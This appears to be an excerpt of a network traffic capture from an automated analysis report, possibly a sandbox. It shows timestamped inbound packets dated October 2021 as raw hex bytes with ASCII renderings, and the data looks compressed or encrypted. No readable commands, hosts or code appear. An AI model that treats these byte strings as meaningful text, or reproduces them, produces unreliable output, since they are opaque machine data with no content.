2021-10-13 13:52:05 UTC	604	IN	Data Raw: 1a e0 b9 ed f9 b7 41 1f 3f 62 3d 9a 96 24 42 e8 53 08 ca fc 29 64 63 d8 71 98 4f d7 2c 72 a6 d4 87 ac 4f f6 84 ab 86 5e e3 77 26 bc e1 52 32 b6 28 0a 84 54 ce 2e 26 1a 5d 9e 5f 4f 17 7d 9e bf 31 07 c1 64 fd 7e 13 84 f2 87 27 74 a3 3a 4c 0f 85 38 0e f8 a9 ff f4 e3 a9 74 fd b4 11 48 7c 0c c8 40 97 3b 75 09 81 dc 21 33 ba 55 83 9f e1 e1 fd 9f 64 e4 12 7a da ef ce df 38 7c 2a 56 7c a3 54 be 17 c5 2b 0b 4b 22 a6 99 5c 5e 9f b9 d8 a6 27 64 58 ee e6 54 51 43 9d 1e 95 90 ab 76 25 78 25 fc 95 65 80 36 af 47 e5 b1 72 10 e1 29 82 f6 1c 6b 5f 51 63 f2 47 84 59 43 ee dc 0d 85 55 de f1 93 12 fc fa 22 ae e7 cb c1 3d 9c e0 40 3c d8 2e 1b 34 a4 7f 1f 67 1a 61 4e 13 25 8c d3 07 d5 f7 25 4b 63 13 15 08 bf a6 56 9d b0 99 10 18 e1 05 33 4a 6d 4f 39 47 dd bf 19 de 43 2f 15 4b Data Ascii: A?b=$BS)dcqO,rO^w&R2(T.&]_O}1d~'t:L8tH\|@;u!3Udz8\|*V\|T+K"\^'dXTQCv%x%e6Gr)k_QcGYCU"=@<.4gaN%%KcV3JmO9GC/K
2021-10-13 13:52:05 UTC	605	IN	Data Raw: 58 fa 81 16 de 27 8e f1 89 b7 f7 a5 b5 01 83 92 5d 4f 16 70 0e ce 64 c4 cd d8 7b 02 a3 e3 f0 87 f6 fb 77 66 5c bb cd 57 d1 c0 30 c0 5c 8b 9c d9 2b 04 92 ac be 60 40 7a 9f 9a 42 03 ca 40 c6 86 21 70 3a b3 4a a1 43 3d 51 4c ad a8 71 95 d1 23 a8 4a 4f 3a bd f1 3a 07 17 d5 5a 8c 05 da ee ff 9f 9c f8 27 b2 45 b0 dc 11 e9 40 aa c4 a3 55 61 c5 f8 d4 69 09 e9 e5 5a f6 25 2a b5 23 30 29 92 29 eb 8d 48 60 45 1f 4b c7 2c d1 f3 0e 0b 9b 10 65 15 66 61 19 74 e0 be c8 8e 10 bb 20 60 e8 46 92 0f 20 36 f2 3a 4a 7f 2e 1e d5 9d 89 50 af b6 41 15 5c c2 ef 9c d7 e1 7c 7c 4c e6 57 3d b8 2c af b6 08 19 6b b2 17 3c ac c6 0b cd fa c5 67 6a dd 68 7d 6e d8 96 30 7f 57 32 2b ab 40 48 98 01 69 a5 31 aa c0 f8 65 9b 2e 75 70 f5 45 83 17 71 ab eb bf 2c 6a b2 82 66 20 e0 e0 0c 2b 67 1a Data Ascii: X']Opd{wf\W0\+`@zB@!p:JC=QLq#JO::Z'E@UaiZ%*#0))H`EK,efat `F 6:J.PA\\|\|LW=,k<gjh}n0W2+@Hi1e.upEq,jf +g
2021-10-13 13:52:05 UTC	607	IN	Data Raw: 7d 6c bb 13 69 6a d8 76 95 87 ab 28 b8 ac 0e 4f 49 52 75 22 11 32 9a 85 72 9d 83 84 a1 8f 39 95 35 b0 6e 57 88 e9 e8 8d c7 01 e8 38 6b aa d5 5b 01 a9 ff 05 86 28 bf e6 a1 b0 41 a3 27 ca 7a 90 20 30 d7 37 c9 ef 59 ab f0 c7 9a 97 3a 3f 9a 6a 07 7b 3c 5b 90 a0 36 02 5b c8 c1 8b 32 ed b1 61 f0 ee 07 01 12 39 95 d7 eb fa 74 93 a0 18 d9 52 74 85 22 32 b5 6c 7b ec 09 f1 63 a0 be 5d 55 1c 1f 3a cb ec e1 71 5f d4 77 f8 16 49 ed e6 f7 cb 65 1b 0c 8e bb 81 d5 c6 ea 7b 6d db 2b 9b 15 8f cf 4e 4a 67 8a 3a dc 7b 66 b3 87 75 b3 04 b1 e7 90 9b 2d 50 68 f6 27 29 6b a5 5c 0c 0e b4 31 6a d4 dc a1 44 9d 47 31 16 08 f6 35 9e 90 47 fc 27 cb 04 d8 95 f8 d6 8d c3 4e e1 f6 ec c2 8d 6c 55 e6 78 69 ca a5 27 bd 3d 32 8a 90 1a 3b 83 99 18 c0 f7 89 15 0c 75 7e f7 11 94 f6 00 83 ad 2a Data Ascii: }lijv(OIRu"2r95nW8k[(A'z 07Y:?j{<[6[2a9tRt"2l{c]U:q_wIe{m+NJg:{fu-Ph')k\1jDG15G'NlUxi'=2;u~*
2021-10-13 13:52:05 UTC	608	IN	Data Raw: 40 1f 57 c0 7f b9 b4 33 82 59 01 3c fa bb eb f0 10 a0 dc d6 78 b3 09 b7 87 27 c2 f2 4f 16 60 17 92 b5 e1 03 7b 76 4e be b0 31 2b d9 3d 36 85 98 80 98 0f e7 3c 5c 1b 00 37 2f 13 49 df a5 72 c6 8e f9 20 71 b2 0b a5 79 a0 59 84 1c ee 5b 76 9e a2 82 87 09 2f 34 d5 5a 8f dc 8b 9d 59 4c 22 92 dc c5 17 02 58 bf cf 26 65 86 f5 e1 f7 ad 97 a1 7b 07 7c d5 54 f5 b9 80 13 27 b4 09 23 ea e7 7c 69 cc d1 84 3b f6 59 6d b5 a9 3f 39 39 85 ae f0 32 e3 82 c4 d8 d1 ea f9 2a 6c ee df 08 bf 19 11 3e 5a 3b fe b7 98 59 1d 41 48 d2 09 52 78 37 b9 30 dc ed 0d 6d 22 d3 07 a9 a7 96 99 13 c7 74 14 77 f6 e2 88 c5 bc f5 3e 64 2a c2 44 f7 95 a2 8c 73 f5 97 e5 11 65 43 60 dd 55 29 b8 64 c9 21 09 8b 9b 92 87 aa f4 6b 5a e5 32 65 33 94 83 71 22 e4 ed 48 85 b9 79 ff 87 6c 88 3a 04 62 ef 0a Data Ascii: @W3Y<x'O`{vN1+=6<\7/Ir qyY[v/4ZYL"X&e{\|T'#\|i;Ym?992l>Z;YAHRx70m"tw>dDseC`U)d!kZ2e3q"Hyl:b
2021-10-13 13:52:05 UTC	609	IN	Data Raw: 33 fb 78 72 93 91 81 3b fe 88 e3 37 aa 82 25 cd 97 82 1d e8 f3 7a 28 9a 87 65 ee ba 4c b4 4e 2d 34 cc de 64 7a fe c8 e1 a7 33 d8 52 45 29 df 45 5d 6d 02 43 44 e8 ef c8 78 03 9d f5 3b 9b b4 86 be 95 67 b0 cf 77 df ee 3b 3c 18 8a f4 19 a2 19 bf b4 99 97 41 60 75 5b 9e f1 fa 21 fd 67 42 f7 29 a3 4c 0a e0 a9 fc 9e b5 55 66 a5 5e b1 f1 21 f7 bd 03 f2 c7 2c b1 ef cd b1 5a 2d f2 56 d6 2d 51 99 e6 08 94 f2 9b d5 9c bf bb 3c ab a9 44 3d 3f 01 6c d2 1b 5c 9c c8 42 1f ff 62 20 d5 2d 7f e6 c1 93 67 e5 9d b2 5a fa 1a fa 05 90 5c 3a 04 70 b2 28 fb 2c 28 4e ae 27 2a 8d b7 56 7e cb 8a ea 17 3c 28 da b0 40 e4 82 2a b8 3f 9d 00 e6 b5 78 4e 98 8b 3e 0d 71 73 cb 16 8a 6a 27 1c a4 37 8c 12 6f ed 22 f1 22 c0 b4 d0 de 05 12 04 77 a6 67 d2 57 bb 81 a5 87 1a 4a 9a 3b 7a 00 4e 46 Data Ascii: 3xr;7%z(eLN-4dz3RE)E]mCDx;gw;<A`u[!gB)LUf^!,Z-V-Q<D=?l\Bb -gZ\:p(,(N'V~<(@?xN>qsj'7o""wgWJ;zNF
2021-10-13 13:52:05 UTC	610	IN	Data Raw: ee 34 be 61 ea 57 7f 91 fc 53 f2 21 07 ae 10 8f d3 af 4a e8 04 44 b5 08 f0 52 cc 0a 07 7f 4d e1 8e 26 e9 7d cc fd c6 15 46 10 2a dd f2 7e af f6 40 e5 8b 09 cc 8b f4 14 57 e8 d6 16 bd 73 7a 87 d5 13 11 b7 6b f6 db f2 09 b0 52 27 4f 52 39 0e 50 74 17 dc 0d 11 21 0a ea 88 39 e6 f7 02 91 55 11 c0 8b b1 0e 09 af 8c 28 40 0d ad 1f 5e 60 ea 1e e5 26 62 94 2b 4d 8d a9 3f 9b 38 1b 96 98 75 c9 93 5a 07 ac 40 b7 a9 c8 56 84 08 97 03 66 f7 1e b4 9e 41 53 91 d8 ca c7 c0 c1 de 9a a7 29 24 04 04 00 cf 61 da a9 3c 07 86 52 ba 79 73 4e 18 54 28 f6 c8 78 17 ee d7 e5 97 d1 8f 07 19 16 5d ee 92 1a 38 a5 39 0c f6 f6 10 a4 b1 ed b1 a1 69 d9 a0 33 9f 7d 5e 7f 0c e0 68 bd b3 f4 fa 11 1f a6 80 ab 07 38 56 1e b1 d5 7d ec 95 95 40 f1 e6 74 70 8c d5 b4 f4 b9 8e 1e bc 0b 15 d5 7e d7 Data Ascii: 4aWS!JDRM&}F*~@WszkR'OR9Pt!9U(@^`&b+M?8uZ@VfAS)$a<RysNT(x]89i3}^h8V}@tp~
2021-10-13 13:52:05 UTC	612	IN	Data Raw: 4f 60 7c 85 8b b0 b0 f2 91 e2 92 0c 71 a4 41 3a ad cf b3 4a a4 b5 ad 5a 7f ee fb f8 b6 cd d0 f4 d5 57 ee f6 a6 44 34 20 50 8b 05 f9 6d f4 ea 37 55 07 3e c3 3e 2d 0b cd bf 89 8a 92 54 06 8b af 18 19 5b e2 66 80 e7 b9 41 1f ea f6 c5 fc f2 7a c9 8e ca c7 a5 b1 11 41 b9 20 fc cb be a3 9e 30 c5 80 a8 21 1b 73 03 f8 76 a2 59 f8 88 b4 e3 ea 30 64 7d 0a 07 13 cd 75 fb 85 da f8 04 8b 19 a9 2c bf 81 52 89 12 20 38 fe 8a 4e eb a0 f1 7a 77 d9 56 8c 29 c3 87 79 8f 88 b1 69 ce a9 24 40 93 c1 6f 37 1d f1 b8 8e 10 85 2b d7 b4 71 4b 05 3d bf bf 76 fa 4d 00 af 41 af c2 45 ea 54 e8 b7 95 25 38 8e cb 88 01 63 3a 8a 2c 78 ee 19 d1 37 bf 0a ce ce 99 05 ae 65 15 5a 7a df a8 6a 4e 6e 41 a2 ea 11 c0 65 22 9c 8e 09 70 9c 64 11 b0 3f a4 e5 00 45 60 4c c4 21 f2 c0 ec 54 29 ef 07 29 Data Ascii: O`\|qA:JZWD4 Pm7U>>-T[fAzA 0!svY0d}u,R 8NzwV)yi$@o7+qK=vMAET%8c:,x7eZzjNnAe"pd?E`L!T))
2021-10-13 13:52:05 UTC	613	IN	Data Raw: 3b 70 6a 8d 32 04 ef 6a af d6 d4 19 48 d5 c0 bf dd fa 24 8a 70 6f 49 99 4f 56 14 62 82 17 b0 78 52 cd 0b 60 0b 3f c7 ec ec 05 84 00 9e c9 d7 0f c6 bd 7c ad e4 49 65 c8 37 ea 52 84 b8 55 ba 34 6b 5f a5 c4 c1 a8 47 f8 90 6c 19 03 4e 41 35 8e 8c ab ed f5 39 ec 96 f1 a3 49 29 4e f0 ce 00 f9 be 46 e7 87 04 b9 f9 29 24 9f af 89 02 9b 47 9a 1e 06 d0 2d 6f a6 68 28 53 31 8f ae 7f cc ac c3 0b f3 9a e7 37 c5 fd b6 8f 18 ec 73 ba 42 f6 48 13 a1 99 55 07 27 d8 43 03 90 ac f1 11 bf 2e 9c ed f8 74 e7 c4 18 bb d2 af 07 fc e9 72 64 3b a1 15 ac 5b 78 83 3d 99 83 87 54 ee a8 1e 53 25 f8 7f f5 bf 86 58 ff 74 64 f6 fe 37 32 15 35 2f 92 59 2c 3a ed a0 44 5b 6e 90 33 a0 6b 3d 20 2d c6 ef 32 fe 7e 04 c3 80 ef c8 ae 48 cd a0 fa 90 e6 9c 6f 8e 55 a3 44 31 66 4e 49 20 e1 9a 8e 37 Data Ascii: ;pj2jH$poIOVbxR`?\|Ie7RU4k_GlNA59I)NF)$G-oh(S17sBHU'C.trd;[x=TS%Xtd725/Y,:D[n3k= -2~HoUD1fNI 7
2021-10-13 13:52:05 UTC	614	IN	Data Raw: 4e cc e5 11 9c 1a 70 b3 49 35 75 36 09 ef 5b d0 c5 92 0f d3 ea a4 33 e7 a5 f3 1b bb a5 91 8b b7 fc af c8 d7 cc d7 e4 97 4f 41 16 59 21 e8 6c 48 99 05 eb 90 ce 1a c1 d4 09 7a ac ff 10 cb c5 70 f9 ef 97 3f 40 ca 98 fb cb 8f 1b c3 c1 0b d3 de 18 20 7b f4 ef ff 68 85 d0 a7 3d e8 02 c6 ad 12 04 8b 58 7a 04 b2 35 f0 db a8 f4 51 f6 54 65 c1 29 f7 e2 41 17 1d b7 6d 91 11 57 17 19 e5 0a 92 19 2c ca 64 85 44 54 12 ff bb c4 9e 09 f7 c3 ed 76 c3 7c 7c cd e3 ef d5 dc d5 5f ac 2f 9d c0 b0 d3 b9 fd 0a 11 63 8d 9f ea d5 e0 13 f8 d9 25 02 e3 44 40 27 10 7f a5 91 58 07 31 94 3e ef 0b eb 83 96 43 72 9a 67 66 21 a2 2d 5e 93 bf 5f e8 2d 43 45 c2 de f3 36 4b 41 67 3e 38 cf 61 e7 57 97 62 bd 38 59 8d 1c f9 f3 45 33 c7 e9 7a 15 9c 45 6f e2 88 99 6e 55 71 6d 79 0e 67 05 ca d2 f9 Data Ascii: NpI5u6[3OAY!lHzp?@ {h=Xz5QTe)AmW,dDTv\|\|_/c%D@'X1>Crgf!-^_-CE6KAg>8aWb8YE3zEonUqmyg
2021-10-13 13:52:05 UTC	615	IN	Data Raw: 5e df 3c a9 79 30 a1 e7 03 3c 5d 82 0c 85 3a d5 11 db fd 30 df d0 44 aa 2d 67 e4 5c 18 69 95 8d 85 9a bc 9d 7b 78 7b 77 f3 f8 41 83 29 3e 49 7f 0b f7 ba a4 4f 97 cf 68 03 50 f9 ec cf 86 5d a0 64 a8 56 6d 09 d4 af c8 66 1e 24 25 6e d4 98 11 8e 91 3d f2 ea 66 1a a1 40 de 1c 65 b8 6e 88 4e 23 39 6d ac 44 d1 bd cf 4b 2f fb e9 37 b0 9b db 8a e6 99 ca 8b 1e fa da 49 3e 45 bb 43 b6 55 d9 7a e3 1b 9b f9 f6 42 d3 23 65 8f 1c f4 81 ae ef b7 67 92 9b ac ca bc 48 6f b0 3c 2f 10 6b 89 84 6b 27 e1 b5 b5 63 5e 32 0f 34 9d 3f 92 c9 69 4c 13 88 70 18 e0 42 80 7d 91 25 19 cb f9 81 7f c6 fd cd ea 09 25 d1 d9 e5 2c 65 90 20 cd 34 dd 00 5a c7 71 1a 0b f8 02 eb b7 3e 38 e9 a0 b8 e1 fe f2 c3 e2 43 b0 d9 03 75 f4 50 8f 8e 3a ea 2f bb 57 ac 28 65 6a 70 5a 10 d0 d8 2a 1c 56 4e 28 Data Ascii: ^<y0<]:0D-g\i{x{wA)>IOhP]dVmf$%n=f@enN#9mDK/7I>ECUzB#egHo</kk'c^24?iLpB}%%,e 4Zq>8CuP:/W(ejpZ*VN(
2021-10-13 13:52:05 UTC	616	IN	Data Raw: 58 25 fa bd 73 21 3c 1a 71 5a 8e 44 01 34 b7 39 73 6a 27 b7 01 d2 46 90 b4 42 90 ce df 6d fb 42 fd 93 ed 99 26 27 c0 32 ba 71 d7 64 24 04 e1 1d cb ba 19 f5 33 8a f5 5d a3 04 bc e3 c7 b7 ef 1e f0 de ee 76 d5 85 35 a5 31 66 1d f2 5f 8f 64 0c 7f ad b1 9b 88 6c e1 68 2f 46 cf a1 e3 f3 76 6f 18 72 c8 43 f8 8f f3 f4 b3 c3 61 65 49 4c ec bb f3 fa b0 0e 10 54 7a 40 54 3a c0 7f bf 76 1b 8d 05 fd 3f 2c 87 87 b2 eb c1 91 87 2a d8 18 9b 02 fc 3d 91 da 18 d9 13 e0 de b9 eb 25 3f 4e 35 a5 b4 25 e9 81 9b 2a 21 d6 f3 34 09 d4 5a 57 e8 ad e2 5d 5d 0c 36 33 c5 02 b7 21 1b 75 d3 dc 0a 1b b2 f0 31 40 db 12 c9 5d 7d 58 87 10 99 c2 31 fa 51 1d d2 06 58 a9 85 3c 59 ce 0d 58 1c 0b 3e 5d d7 77 0c 87 d7 90 df 40 d0 7f 6b 7b a5 fd 7f 67 e4 21 a1 8f fd 15 33 1b 8d 96 53 37 a5 e6 31 Data Ascii: X%s!<qZD49sj'FBmB&'2qd$3]v51f_dlh/FvorCaeILTz@T:v?,=%?N5%!4ZW]]63!u1@]}X1QX<YX>]w@k{g!3S71
2021-10-13 13:52:05 UTC	618	IN	Data Raw: bf 5c 4a 70 ac 9b 46 be 5a 4b b0 a9 e0 cf 9e e6 59 bf 4d 18 48 d6 7c 6a 56 e8 92 bb c7 e3 9f 75 57 58 13 97 a1 54 23 da e9 fb e9 5a 3a c5 ba d0 0f 8e 81 8e 1d 6e 3d 20 5d 3f dc e3 63 6d d8 05 35 b9 52 16 c2 db a4 45 f8 c7 8f a3 7a 6a c7 1f 93 1e c3 ca 0d d9 a3 b7 40 ba 41 e6 76 2d 16 0b 6f fa 2f df 4b f7 25 43 14 99 1a e4 6d 1c 7c 7a 1d 32 0f 07 a4 c0 4e 8c d5 9f 7f 3c 33 cc 57 e2 f0 27 fb 1c fb c8 8f c9 d6 eb 3f 3a c8 bf 7d 9e a3 bc e2 fc e2 2c 32 74 08 59 56 71 42 ac c5 8d f5 df 61 49 56 15 53 02 78 68 15 c8 4c 3a 17 3a e6 76 c3 5f 0f 4f 57 95 d5 b6 5e 60 bc 29 8d 18 69 8b d2 09 04 43 33 f1 8a ac 01 a5 8f 3d 8c ae 6b a8 0e cc a3 59 6f f3 70 08 7d b1 fd b3 2b df 6d 27 b2 15 22 72 e3 f7 19 af ac 06 81 40 12 bc 26 36 55 34 e8 0c 6d 07 14 6b 6e b3 c9 b3 75 Data Ascii: \JpFZKYMH\|jVuWXT#Z:n= ]?cm5REzj@Av-o/K%Cm\|z2N<3W'?:},2tYVqBaIVSxhL::v_OW^`)iC3=kYop}+m'"r@&6U4mknu
2021-10-13 13:52:05 UTC	619	IN	Data Raw: 6c e1 8e 9e 5d 21 b5 f9 1b c5 6b 09 df db 02 26 c1 db 98 fa 4e 12 ea fd 96 b2 62 26 33 e7 d2 13 c0 07 9d 3c 8c b4 03 e3 cf 03 48 31 59 a2 8d bd 9a 09 d9 a0 a7 02 b1 d7 66 40 fa 65 13 42 13 95 8f 89 43 26 30 72 76 f0 79 22 68 bc db 32 6f 01 51 eb 92 c1 36 15 de 83 84 91 04 e0 76 0c d9 03 43 c7 e6 5c 3c 84 3b b1 9f ed fb 2f b6 4a fc c6 9a 62 49 3e 91 ea 5e 22 40 0c a5 77 ae 6b c3 fc 90 7e 65 8c eb 37 09 30 6a 69 ba 8f 43 41 e3 47 17 d4 b3 fa 70 59 b3 8e e5 5d 39 47 b8 47 0f 32 11 d7 4c 8e 4f f0 22 c7 41 ec d0 e9 4d 69 49 53 ab 2d 0e 31 7a 6f 59 c8 5b 8e f2 63 2d 1e 6f 37 25 84 b2 1e 8e 30 84 93 78 17 dc 0b a9 85 b2 e1 88 53 69 2f 63 e2 41 b4 1e 6e c7 65 f0 87 de a3 1a 9b b9 89 eb ff 7f ad c2 3a 60 92 33 f1 8c ca 83 b5 69 90 58 50 23 cf d1 0f fe 01 c4 01 8f Data Ascii: l]!k&Nb&3<H1Yf@eBC&0rvy"h2oQ6vC\<;/JbI>^"@wk~e70jiCAGpY]9GG2LO"AMiIS-1zoY[c-o7%0xSi/cAne:`3iXP#
2021-10-13 13:52:05 UTC	620	IN	Data Raw: f6 f5 27 20 18 3f da 11 8f 0f 3f cf e2 ac 06 d4 60 bd 3c b8 ac 12 ba 3b 0e 53 38 68 a9 c5 1f c1 5d 28 0d d8 71 e5 38 1b 20 8d bd fb 92 78 a5 34 8a a6 74 a4 d9 14 1d 93 87 a2 15 a4 7e bb 64 fb 36 a8 48 48 13 aa 72 cc 32 6d 3d 5e 62 a7 eb b4 bf 5e 2a ce ed 08 ae 08 b7 6a db 17 b3 16 e2 54 f2 7b cb 6f b8 6d 02 26 c7 58 37 c0 aa 51 a2 64 0c a2 b0 a9 26 da 64 8b a3 12 52 74 e4 f3 29 51 63 c9 3f 9e 09 9b c4 87 a5 4c 98 79 2c 62 5c 79 57 78 ef 33 c3 40 0f 7c c2 bb 4f 4d cf b4 29 03 06 1e 51 d4 7f 78 ef a2 73 94 81 5d 3d 3c 46 b1 81 38 a6 85 92 6c 45 b5 30 89 d4 32 7a 07 1b 35 0c 37 e3 25 4a 81 76 9f 67 0f 9a 7b 8c 30 40 e8 ad 3f 43 a1 8a 67 62 2d 22 c6 39 90 bb 92 ab cc 4d 25 bf 5c ea 38 57 d6 0d f6 0c d5 85 36 fa fb 83 92 e0 48 54 99 2e af 94 64 d9 31 42 13 5e Data Ascii: ' ??`<;S8h](q8 x4t~d6HHr2m=^b^*jT{om&X7Qd&dRt)Qc?Ly,b\yWx3@\|OM)Qxs]=<F8lE02z57%Jvg{0@?Cgb-"9M%\8W6HT.d1B^
2021-10-13 13:52:05 UTC	621	IN	Data Raw: e6 03 c3 67 ad f0 7d c7 5c 51 81 63 48 5f b2 ad f2 94 52 93 c9 6b f5 4c 9e d1 98 87 44 21 b2 37 57 13 d6 1d 27 79 88 dd 0d 6d 99 ca a3 cd 78 1f 66 24 cd 14 f0 28 6b a3 97 00 63 6c e2 80 e3 a7 71 b6 5d c6 04 5d aa 8d da c7 cf b8 cf a1 e1 4c a5 1c fa ae 8b c0 71 c5 ec c9 d2 49 89 3c b6 3f 05 af 47 ad bf f8 3c d6 03 10 4f fa 09 95 8b 92 45 4f f8 3f f0 e6 74 70 8c d9 8e 0d 73 ed 09 30 7e 7c 8e 00 c5 96 e8 dd 7f 80 75 8f 8e 2f c7 9b 7e 77 cc f0 ae 9e 3c ec cb 3d c7 0a 96 d0 2d 07 ac 2c 82 a0 61 c0 23 b7 54 d5 ac 87 f7 73 4c d3 96 69 a6 d8 14 65 25 87 8d 7b f4 c1 3d 0f c4 c7 ee 28 aa db be b7 44 15 03 fa 54 81 37 e2 dd bd 9c ba 9e dc f7 a0 58 89 9e 83 e1 3d 23 52 5d 37 7e fe d3 06 25 1d ef 9c f1 d8 36 14 0c 5e a7 8e cd 86 dd b4 3b 42 0f 29 f2 f2 e5 ea 4e 53 54 Data Ascii: g}\QcH_RkLD!7W'ymxf$(kclq]]LqI<?G<OEO?tps0~\|u/~w<=-,a#TsLie%{=(DT7X=#R]7~%6^;B)NST
2021-10-13 13:52:05 UTC	623	IN	Data Raw: 51 1d 31 b8 4c 22 c0 65 5d 1c 12 b0 32 07 3e 0f ed 9f c6 78 a5 3a a0 d6 92 0f d5 54 f6 11 80 13 cc b2 b4 22 96 dc 01 60 b2 61 9c bf 12 7b 82 e7 e4 3f 39 53 6f c6 8d 7f c4 7b 13 f7 5a b6 9c 02 f4 54 20 bb 0c 8c 79 30 27 ce 71 be 67 5f 61 22 f7 8e 52 0d ab 30 6c a9 0c 1e 87 e1 73 23 03 ca f2 8b ca 45 26 00 76 70 11 06 26 ff 06 f6 6c 32 c2 3a ef 0f 9f d1 f6 db 62 68 f2 7e e9 fd 44 a3 55 a2 17 07 1b 45 63 89 a1 c5 05 f4 dc 19 5d 93 15 19 a6 e2 ee 7e 14 12 4d 95 72 49 af e1 9a cc b4 4e 19 2d 54 ff 45 b0 49 da b6 17 87 d2 51 36 0c 26 29 69 27 29 7e b7 01 3d cb cd c7 fd 4b 36 49 1f 85 1c 21 17 f8 6f ec 8e c0 84 49 68 1d 81 a8 d2 3a ac cf 8f 2b 66 44 e5 53 5f a5 4d a9 80 ea 0a 51 5b da ff 86 32 d8 e1 d6 58 94 8d 63 05 2a 3a ac e2 2e 7f 2d 44 1f 6d 2e 91 10 34 dd Data Ascii: Q1L"e]2>x:T"`a{?9So{ZT y0'qg_a"R0ls#E&vp&l2:bh~DUEc]~MrIN-TEIQ6&)i')~=K6I!oIh:+fDS_MQ[2Xc*:.-Dm.4
2021-10-13 13:52:05 UTC	624	IN	Data Raw: 0c c6 16 07 e4 dd 2a 2e f6 4c d0 f4 50 3e 9b 2b 66 b7 22 d3 ca c0 b2 e6 19 26 62 af 09 40 12 54 26 9e 18 74 e0 d4 6a 07 ad 36 f9 7d 33 e2 27 53 c4 7b 68 a0 8b 60 24 7e 2f d5 46 3b 29 7c dd 20 31 75 40 1a bd 3c 2e fa 81 a3 8c 3a 72 44 82 f0 bf 26 6c 78 e4 ea d4 99 4d 65 29 01 d5 5e 44 28 07 bd 1b 45 63 b9 f8 f9 20 3a d4 59 86 32 73 a4 d9 e1 92 21 78 6c f2 07 71 05 4b 23 b0 e3 af 3c aa 16 73 4a 63 00 ec 8d b7 59 d2 23 41 6e 02 19 ec e7 f7 6d 08 10 5c 58 ba 68 06 0f b7 d4 f5 22 60 5e 4e 43 fb 54 28 86 e6 f1 c6 43 ae 35 90 0c 49 ba f3 aa 3b 09 33 cc 58 74 ed f6 16 e7 cb df 80 c2 4c 84 fc 0c 78 b0 fc a3 4a 74 8b bb bd 88 27 52 14 29 26 3c 6c fe ef e0 07 bd ba 88 6a d6 ec 08 ac 59 d3 3e 44 3f 51 5d e6 1c 08 c2 a3 23 fc 20 24 8b 18 0a 52 b9 c5 70 96 21 1b 7d 42 Data Ascii: *.LP>+f"&b@T&tj6}3'S{h`$~/F;)\| 1u@<.:rD&lxMe)^D(Ec :Y2s!xlqK#<sJcY#Anm\Xh"`^NCT(C5I;3XtLxJt'R)&<ljY>D?Q]# $Rp!}B
2021-10-13 13:52:05 UTC	625	IN	Data Raw: 4e 03 09 77 c4 39 08 cd 1e 6b f7 e5 fb c2 8f fe 1d 53 41 03 ae e3 a5 63 73 2d 85 52 60 66 99 4d ee e5 bb df 19 d5 34 b8 fc 9e dd 57 9d 99 8c ae f2 f0 60 8f 68 e7 01 f0 38 3d d5 fa 41 e2 8b 4c 2c 1a 1e df 8a b1 53 c5 ee a5 6a 5a da cf 88 43 5b 0e d9 fe 71 cf 24 36 78 3e 56 e8 6d ea e4 a8 87 ba 57 12 98 7f b6 c7 2e e6 81 14 56 b6 a3 82 03 d0 a6 0d 41 46 e2 30 94 3b 6d 2d b6 85 0b e8 1d e1 b5 e9 6e c1 ae 23 d0 11 f8 c7 70 f2 59 21 df d0 93 54 50 5e 44 48 e6 e5 68 eb 53 9c ef 6a af 0b ce 79 ef 1e b4 a9 8d 58 24 8a 70 82 05 90 b9 9a 9d 73 33 d0 c8 20 ea d9 d5 9f 80 6d 1c 87 4f 39 f8 16 e7 e3 3f a8 28 c9 c7 f3 17 3a c9 bb 38 48 6e 1f a5 ab aa b9 3a 7f 6f 0e 61 ea 42 19 7c 8d 5c 5c a1 81 a9 4b fa 19 48 7c 7f ae 24 bf d2 c6 66 26 ff 88 63 b7 b3 c0 d5 b6 a1 31 9f Data Ascii: Nw9kSAcs-R`fM4W`h8=AL,SjZC[q$6x>VmW.VAF0;m-n#pY!TP^DHhSjyX$ps3 mO9?(:8Hn:oaB\|\\KH\|$f&c1
2021-10-13 13:52:05 UTC	626	IN	Data Raw: 7f ea fb 69 67 a3 89 2e 93 97 2f 6e ee c1 61 ba a6 d4 c1 13 e6 0b 03 da 5d 7d 51 d9 14 96 74 96 1e 0a 40 9a 84 80 77 4b d8 5f 17 0a dd f5 7f 5d 84 c2 93 29 ba 5c 33 0f b7 23 14 9a c8 bf be ff d0 a1 39 84 27 42 2b d2 64 4a 15 e3 3c b1 8e b9 58 e5 4a c0 05 b7 32 3b 64 03 6b 67 78 1d 78 f4 9f 86 27 44 d3 3c 56 7c bf 54 8e 0b 1f 37 84 4e a7 e1 72 36 ad 0a 44 0a 30 c3 68 cd 9b ec 91 6d b2 6c 39 c7 4c f6 28 bd ac 36 7f fd 3c 4d 54 33 69 9f f9 34 c8 37 ec 2a 38 6e 70 c8 de 11 67 98 dd 72 82 f9 ec c8 38 82 67 7a c6 e5 70 34 f6 f4 2b 3b 1a 58 c2 3c d1 66 5d 92 f7 57 89 81 93 f4 ec 7b 40 9f 40 0a 9d da 60 b4 53 4e a9 84 2a 64 b3 b9 ab ff 22 f4 f4 39 fd 06 66 1e e3 d0 c5 c3 42 bb 5f be dd 03 6b 25 3a 0c 84 c8 75 16 25 0f ed a8 e6 63 e2 81 82 25 84 47 a1 5b ea a8 17 Data Ascii: ig./na]}Qt@wK_])\3#9'B+dJ<XJ2;dkgxx'D<V\|T7Nr6D0hml9L(6<MT3i478npgr8gzp4+;X<f]W{@@`SNd"9fB_k%:u%c%G[
2021-10-13 13:52:05 UTC	628	IN	Data Raw: 41 a8 66 46 c9 2b ff b5 b6 23 36 ee 35 d8 b1 8e 94 de 9b 51 b8 e9 2a 93 78 53 ac 6f a6 18 7a 3c 78 44 08 8d 93 a1 54 83 1a 1a 1d 17 b1 d8 25 10 6e 6e 71 3f 4f 75 c9 36 0f 78 55 d8 ac 1a 0f 5b 2d 6d 0e 4a f0 17 65 c3 fe a4 38 60 0b 0f b9 ac b6 99 28 a7 6e 8b a3 91 7e 2f 07 88 22 e4 34 ab 1c e1 1b f8 84 b2 52 8d 43 e6 b5 a6 a2 9c 11 09 1c d9 ed 68 39 ca d1 a4 4e b1 c3 c6 c7 d1 e3 bb 45 9d b5 06 28 dc 6b cb f1 34 80 46 37 b3 e7 dc 6e d8 ff c7 79 68 ea b5 01 17 d6 5b 25 c0 e5 c9 34 27 64 8e 8a 54 f3 78 cd c8 ac 5b 66 4d 47 ea fc 69 c4 5a 49 a7 03 4c 93 dc c4 f8 c3 58 f4 68 4e 96 2a 42 c7 d1 2f 30 ee fa 80 af 76 17 03 b5 35 cb cd f7 96 7a 3a 04 3f 70 de ba 22 a1 0d 30 1c 79 70 4c 32 fc 24 bc 57 a3 f8 c1 91 8b bb 64 0f bc d2 da 29 62 dc c6 9e 3a 94 3f 67 c2 50 Data Ascii: 